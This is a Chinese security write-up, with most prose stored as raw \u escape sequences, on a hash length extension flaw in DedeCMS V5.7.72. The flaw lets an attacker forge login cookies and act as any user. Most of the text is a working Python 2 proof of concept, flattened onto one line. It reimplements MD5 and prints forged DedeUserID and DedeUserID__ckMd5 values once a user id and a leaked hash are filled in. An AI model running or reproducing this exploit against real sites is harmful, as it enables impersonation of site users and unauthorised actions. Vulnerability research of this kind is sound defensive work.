记DedeCMS一处由哈希长度拓展攻击引起的越权漏洞

\u3010
\u672c\u6587\u6765\u81ea ChaMd5\u5b89\u5168\u56e2\u961f\u5ba1\u8ba1\u7ec4 \u5446\u54e5\uff0c\u6587\u7ae0\u5185\u5bb9\u4ee5\u601d\u8def\u4e3a\u4e3b\u3002
\u5982\u9700\u8f6c\u8f7d\uff0c\u8bf7\u5148\u8054\u7cfbChaMd5\u5b89\u5168\u56e2\u961f\u6388\u6743\u3002
\u672a\u7ecf\u6388\u6743\u8bf7\u52ff\u8f6c\u8f7d\u3002
\u3011

\u6f0f\u6d1e\u5f71\u54cd\uff1aDedecms(\u7ec7\u68a6CMS) V5.7.72 \u6b63\u5f0f\u724820180109 (\u6700\u65b0\u7248)

\u6f0f\u6d1e\u539f\u7406\uff1a
DedeCMS\u7528\u6237\u8ba4\u8bc1\u662f\u901a\u8fc7\u9a8c\u8bc1Cookie\u4e2d\u7684 DedeUserID\u548cDedeUserID__ckMd5\u8fdb\u884c\u7684\uff0c\u5177\u4f53\u5982\u4e0b\uff1a

\u5176\u4e2d$cfg_cookie_encode\u662f\u5b89\u88c5\u65f6\u751f\u6210\u7684\u4e0d\u53ef\u9884\u6d4b\u5b57\u7b26\u4e32\u3002
\u5176\u4e2dmd5($cfg_cookie_encode.$_COOKIE[$key])\u7b26\u5408md5(salt + padding + data)\u7684\u683c\u5f0f\uff0c\u6613\u53d7\u54c8\u5e0c\u957f\u5ea6\u62d3\u5c55\u653b\u51fb\uff0c\u53ea\u8981\u6211\u4eec\u77e5\u9053\u4e86md5($cfg_cookie_encode)\u548c$cfg_cookie_encode\u7684\u957f\u5ea6\u5373\u53ef\u4f2a\u9020cookie\u3002
\u4ece\u5b89\u88c5\u65f6\u7684\u903b\u8f91\u4e2d\u6211\u4eec\u53ef\u4ee5\u77e5\u9053$cfg_cookie_encode\u7684\u957f\u5ea6\u4e3a28~32

\u627e\u5230\\member\\article_add.php

25\u884c\u68c0\u6d4bdopost\u662f\u5426\u4e3a\u7a7a\uff0c46\u884c\u5bfc\u5165\u6a21\u677f\u6587\u4ef6
\u627e\u5230\\member\\templets\\article_add.htm

74\u884c\u8c03\u7528PrintAutoFieldsAdd()\uff0c\u8ddf\u8fdb\u53bb

238\u884c\u8f93\u51fa$dede_addonfields
239\u884c\u8f93\u51famd5($dede_addonfields.$cfg_cookie_encode)
\u6d4f\u89c8\u5668\u4e2d\u76f4\u63a5\u8bbf\u95ee\uff0c\u53ef\u77e5\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b$dede_addonfields\u4e3a\u7a7a\u503c

\u56e0\u6b64\u8868\u5355dede_fieldshash\u7684\u503c\u5c31\u662fmd5($cfg_cookie_encode)
\u627e\u5230MemberLogin\u7c7b\uff0cM_ID \u5728\u4ececookie\u4e2d\u83b7\u53d6\u65f6\u4f1a\u8c03\u7528GetNum()\u8fdb\u884c\u5904\u7406

\u8ddf\u8fdb\u53bb

\u8fd9\u6837\u5904\u7406\u4e00\u4e0b\u5c31\u4f1a\u6d88\u9664\u54c8\u5e0c\u957f\u5ea6\u6269\u5c55\u653b\u51fb\u5f15\u5165\u7684\u7a7a\u5b57\u7b26\u7b49\u7279\u6b8a\u5b57\u7b26\u7684\u5f71\u54cd
\u4f46\u662f\u5728\u5168\u5c40\u6587\u4ef6config.php\u4e2d\u4f1a\u5bf9\u8f93\u5165\u8c03\u7528XSSClean()\u5bf9$_COOKIE\u8fdb\u884c\u8fc7\u6ee4

\u4ece24\u884c\u53ef\u77e5\uff0c\u7a7a\u5b57\u7b26\u4f1a\u88ab\u66ff\u6362\u4e3a\u7a7a\u5bfc\u81f4\u6f0f\u6d1e\u4e0d\u80fd\u5229\u7528\u3002
\u53c8\u7814\u7a76\u4e86\u4e00\u4e0b\u53d1\u73b0\\plus\u4e0b\u7684\u6587\u4ef6\u90fd\u662f\u76f4\u63a5\u5305\u542bcommon.inc.php\u800c\u4e0d\u662fconfig.php
\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u6b64\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u8fdb\u884c\u54c8\u5e0c\u957f\u5ea6\u62d3\u5c55\u653b\u51fb\uff01
\u4f8b\u5982\uff0c\\plus\\feedback_ajax.php \u7528\u4e8e\u6587\u7ae0\u8bc4\u8bba\uff0c\u56e0\u6b64\u8fd9\u91cc\u53ef\u4ee5\u5229\u7528\u54c8\u5e0c\u957f\u5ea6\u62d3\u5c55\u653b\u51fb\u4f2a\u9020\u4efb\u610f\u7528\u6237\u8eab\u4efd\u5b9e\u73b0\u8d8a\u6743\u8bc4\u8bba\u6587\u7ae0\uff01

\u53c2\u8003\u94fe\u63a5\uff1a
https://blog.csdn.net/qq_35078631/article/details/70941204
POC:

import sysimport hashlibimport urllib#\u6b64POC\u53ea\u9700\u4fee\u6539\u4ee5\u4e0b\u4e24\u4e2a\u53c2\u6570userid = \'1\' #\u6b64\u53d8\u91cf\u5c31\u662f\u8981\u4f2a\u9020\u7684\u7528\u6237iddede_fieldshash = \'8b5d1a6dd0899aff8658b667a0923765\' #\u8be5\u503c\u4ecearticle_add.php\u7684\u6e90\u7801\u4e2d\u83b7\u53d6def genMsgLengthDescriptor(msg_bitsLenth):    return __import__("struct").pack(">Q",msg_bitsLenth).encode("hex")def reverse_hex_8bytes(hex_str):    hex_str = "%016x"%int(hex_str,16)    assert len(hex_str)==16        return __import__("struct").pack("<Q",int(hex_str,16)).encode("hex")def reverse_hex_4bytes(hex_str):        hex_str = "%08x"%int(hex_str,16)    assert len(hex_str)==8        return __import__("struct").pack("<L",int(hex_str,16)).encode("hex")def deal_rawInputMsg(input_msg):    ascii_list = [x.encode("hex") for x in input_msg]    length_msg_bytes = len(ascii_list)    length_msg_bits = len(ascii_list)*8    ascii_list.append(\'80\')      while (len(ascii_list)*8+64)%512 != 0:          ascii_list.append(\'00\')    ascii_list.append(reverse_hex_8bytes(genMsgLengthDescriptor(length_msg_bits)))    return "".join(ascii_list)def getM16(hex_str,operatingBlockNum):    M = [int(reverse_hex_4bytes(hex_str[i:(i+8)]),16) for i in xrange(128*(operatingBlockNum-1),128*operatingBlockNum,8)]    return Mdef T(i):    result = (int(4294967296*abs(__import__("math").sin(i))))&0xffffffff    return result   F = lambda x,y,z:((x&y)|((~x)&z))G = lambda x,y,z:((x&z)|(y&(~z)))H = lambda x,y,z:(x^y^z)I = lambda x,y,z:(y^(x|(~z)))RL = L = lambda x,n:(((x<<n)|(x>>(32-n)))&(0xffffffff))def FF(a, b, c, d, x, s, ac):      a = (a+F ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;      a = RL ((a), (s))&0xffffffff;      a = (a+b)&0xffffffff      return a  def GG(a, b, c, d, x, s, ac):      a = (a+G ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;      a = RL ((a), (s))&0xffffffff;      a = (a+b)&0xffffffff      return a  def HH(a, b, c, d, x, s, ac):      a = (a+H ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;      a = RL ((a), (s))&0xffffffff;      a = (a+b)&0xffffffff      return a  def II(a, b, c, d, x, s, ac):      a = (a+I ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;      a = RL ((a), (s))&0xffffffff;      a = (a+b)&0xffffffff      return a      def show_md5(A,B,C,D):    return "".join( [  "".join(__import__("re").findall(r"..","%08x"%i)[::-1]) for i in (A,B,C,D)  ]  )def run_md5(A=0x67452301,B=0xefcdab89,C=0x98badcfe,D=0x10325476,readyMsg=""):    a = A    b = B    c = C    d = D    for i in xrange(0,len(readyMsg)/128):        M = getM16(readyMsg,i+1)        for i in xrange(16):            exec "M"+str(i)+"=M["+str(i)+"]"        #First round        a=FF(a,b,c,d,M0,7,0xd76aa478L)        d=FF(d,a,b,c,M1,12,0xe8c7b756L)        c=FF(c,d,a,b,M2,17,0x242070dbL)        b=FF(b,c,d,a,M3,22,0xc1bdceeeL)        a=FF(a,b,c,d,M4,7,0xf57c0fafL)        d=FF(d,a,b,c,M5,12,0x4787c62aL)        c=FF(c,d,a,b,M6,17,0xa8304613L)        b=FF(b,c,d,a,M7,22,0xfd469501L)        a=FF(a,b,c,d,M8,7,0x698098d8L)        d=FF(d,a,b,c,M9,12,0x8b44f7afL)        c=FF(c,d,a,b,M10,17,0xffff5bb1L)        b=FF(b,c,d,a,M11,22,0x895cd7beL)        a=FF(a,b,c,d,M12,7,0x6b901122L)        d=FF(d,a,b,c,M13,12,0xfd987193L)        c=FF(c,d,a,b,M14,17,0xa679438eL)        b=FF(b,c,d,a,M15,22,0x49b40821L)        #Second round        a=GG(a,b,c,d,M1,5,0xf61e2562L)        d=GG(d,a,b,c,M6,9,0xc040b340L)        c=GG(c,d,a,b,M11,14,0x265e5a51L)        b=GG(b,c,d,a,M0,20,0xe9b6c7aaL)        a=GG(a,b,c,d,M5,5,0xd62f105dL)        d=GG(d,a,b,c,M10,9,0x02441453L)        c=GG(c,d,a,b,M15,14,0xd8a1e681L)        b=GG(b,c,d,a,M4,20,0xe7d3fbc8L)        a=GG(a,b,c,d,M9,5,0x21e1cde6L)        d=GG(d,a,b,c,M14,9,0xc33707d6L)        c=GG(c,d,a,b,M3,14,0xf4d50d87L)        b=GG(b,c,d,a,M8,20,0x455a14edL)        a=GG(a,b,c,d,M13,5,0xa9e3e905L)        d=GG(d,a,b,c,M2,9,0xfcefa3f8L)        c=GG(c,d,a,b,M7,14,0x676f02d9L)        b=GG(b,c,d,a,M12,20,0x8d2a4c8aL)        #Third round        a=HH(a,b,c,d,M5,4,0xfffa3942L)        d=HH(d,a,b,c,M8,11,0x8771f681L)        c=HH(c,d,a,b,M11,16,0x6d9d6122L)        b=HH(b,c,d,a,M14,23,0xfde5380c)        a=HH(a,b,c,d,M1,4,0xa4beea44L)        d=HH(d,a,b,c,M4,11,0x4bdecfa9L)        c=HH(c,d,a,b,M7,16,0xf6bb4b60L)        b=HH(b,c,d,a,M10,23,0xbebfbc70L)        a=HH(a,b,c,d,M13,4,0x289b7ec6L)        d=HH(d,a,b,c,M0,11,0xeaa127faL)        c=HH(c,d,a,b,M3,16,0xd4ef3085L)        b=HH(b,c,d,a,M6,23,0x04881d05L)        a=HH(a,b,c,d,M9,4,0xd9d4d039L)        d=HH(d,a,b,c,M12,11,0xe6db99e5L)        c=HH(c,d,a,b,M15,16,0x1fa27cf8L)        b=HH(b,c,d,a,M2,23,0xc4ac5665L)        #Fourth round        a=II(a,b,c,d,M0,6,0xf4292244L)        d=II(d,a,b,c,M7,10,0x432aff97L)        c=II(c,d,a,b,M14,15,0xab9423a7L)        b=II(b,c,d,a,M5,21,0xfc93a039L)        a=II(a,b,c,d,M12,6,0x655b59c3L)        d=II(d,a,b,c,M3,10,0x8f0ccc92L)        c=II(c,d,a,b,M10,15,0xffeff47dL)        b=II(b,c,d,a,M1,21,0x85845dd1L)        a=II(a,b,c,d,M8,6,0x6fa87e4fL)        d=II(d,a,b,c,M15,10,0xfe2ce6e0L)        c=II(c,d,a,b,M6,15,0xa3014314L)        b=II(b,c,d,a,M13,21,0x4e0811a1L)        a=II(a,b,c,d,M4,6,0xf7537e82L)        d=II(d,a,b,c,M11,10,0xbd3af235L)        c=II(c,d,a,b,M2,15,0x2ad7d2bbL)        b=II(b,c,d,a,M9,21,0xeb86d391L)        A += a        B += b        C += c        D += d        A = A&0xffffffff        B = B&0xffffffff        C = C&0xffffffff        D = D&0xffffffff        a = A        b = B        c = C        d = D    return show_md5(a,b,c,d)cfg_cookie_encode_md5 = dede_fieldshashs1 = cfg_cookie_encode_md5[0:8]s1 = \'0x\' + s1[6:8] + s1[4:6] + s1[2:4] + s1[0:2]s2 = cfg_cookie_encode_md5[8:16]s2 = \'0x\' + s2[6:8] + s2[4:6] + s2[2:4] + s2[0:2]s3 = cfg_cookie_encode_md5[16:24]s3 = \'0x\' + s3[6:8] + s3[4:6] + s3[2:4] + s3[0:2]s4 = cfg_cookie_encode_md5[24:36]s4 = \'0x\' + s4[6:8] + s4[4:6] + s4[2:4] + s4[0:2]exec(\'s1=%s\' %s1)exec(\'s2=%s\' %s2)exec(\'s3=%s\' %s3)exec(\'s4=%s\' %s4)#\u8fd9\u91cc\u7684\u5faa\u73af\u4ea7\u751f5\u79cd\u53ef\u80fd\u7684DedeUserID\uff0c\u539f\u56e0\u662f$cfg_cookie_encode\u7684\u957f\u5ea6\u65e0\u6cd5\u9884\u6d4bfor origin_length in range(28,33):    if origin_length != 32:        length = chr(origin_length*8)        secret_admin = \'a\'*origin_length+\'\\x80\'+\'\\x00\'*(64-origin_length-1-8)+length+\'\\x00\'*7 + userid    else:        secret_admin = \'a\'*origin_length+\'\\x80\'+\'\\x00\'*(64-origin_length-1-8)+\'\\x00\\x01\'+\'\\x00\'*6 + userid    r = deal_rawInputMsg(secret_admin)    inp = r[len(r)/2:]    ans = \'\'    cnt = 0    for i in r[:len(r)/2]:        if(cnt%2 == 0):            ans += \'%\'        ans += i        cnt += 1    print "DedeUserID: "+ans[(origin_length*3):]+userid    print print "DedeUserID__ckMd5: "+run_md5(s1,s2,s3,s4,inp)[0:16]

PS:
\u5173\u4e8e\u54c8\u5e0c\u957f\u5ea6\u6269\u5c55\u653b\u51fb\u7684\u5de5\u5177\uff0c\u53ef\u53c2\u8003pcat\u7684\u4e24\u7bc7\u535a\u6587\uff1a
http://www.cnblogs.com/pcat/p/7668989.html
http://www.cnblogs.com/pcat/p/5478509.html

~ChaMd5\u5b89\u5168\u62db\u8058~
\u542f\u660e\u661f\u8fb0\u4e91\u4f17\u53ef\u4fe1
\u5b89\u5168\u670d\u52a1\u5de5\u7a0b\u5e08/\u7ecf\u7406
http://www.chamd5.org/jobdetail.aspx?id=510

G7\u7269\u8054\u7f51\u7269\u6d41
\u6e17\u900f\u6d4b\u8bd5\u5de5\u7a0b\u5e08
http://www.chamd5.org/jobdetail.aspx?id=509

360\u4f01\u4e1a\u5b89\u5168
\u9ad8\u7ea7\u653b\u9632
http://www.chamd5.org/jobdetail.aspx?id=498